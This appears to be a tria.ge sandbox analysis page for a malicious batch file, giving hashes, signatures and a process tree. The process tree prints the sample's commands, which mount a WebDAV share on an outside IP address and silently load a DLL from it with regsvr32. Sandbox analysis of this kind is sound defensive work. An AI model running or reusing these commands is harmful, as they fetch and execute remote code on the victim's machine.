Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

1

Static

static

1

3ef76dd504...64.bat

windows7-x64

1

3ef76dd504...64.bat

windows10-2004-x64

1

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/07/2024, 01:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3ef76dd5041262400acb0e1e9a57f9ae100688f0ee355d09c30a841de9d98864.bat

  • Size

    5KB

  • MD5

    a0eb3694b5dc757fa2a4c93bd47e89a4

  • SHA1

    2e7df10f507e4a298789e88eca9712b8bcd9ffa3

  • SHA256

    3ef76dd5041262400acb0e1e9a57f9ae100688f0ee355d09c30a841de9d98864

  • SHA512

    6252e33c6d2aca4258fe3c001c08af13e19f65d74c385cf9ecf8497a5dbca81d286b0e57ab2242d2b7cbd5905d05ec9ca95c8a57125ebe02c719b464e9824785

  • SSDEEP

    96:DMIVD1vVgagBUTvcsqIsWNyFjIfuDIfqsS:Q+DyBUbnkjbDx7

Score
1/10

Malware Config

Signatures

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3ef76dd5041262400acb0e1e9a57f9ae100688f0ee355d09c30a841de9d98864.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:880
    • C:\Windows\system32\net.exe
      net use \\45.9.74.13@8888\DavWWWRoot\
      2⤵
        PID:3444
      • C:\Windows\system32\regsvr32.exe
        regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\648.dll
        2⤵
          PID:4140

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads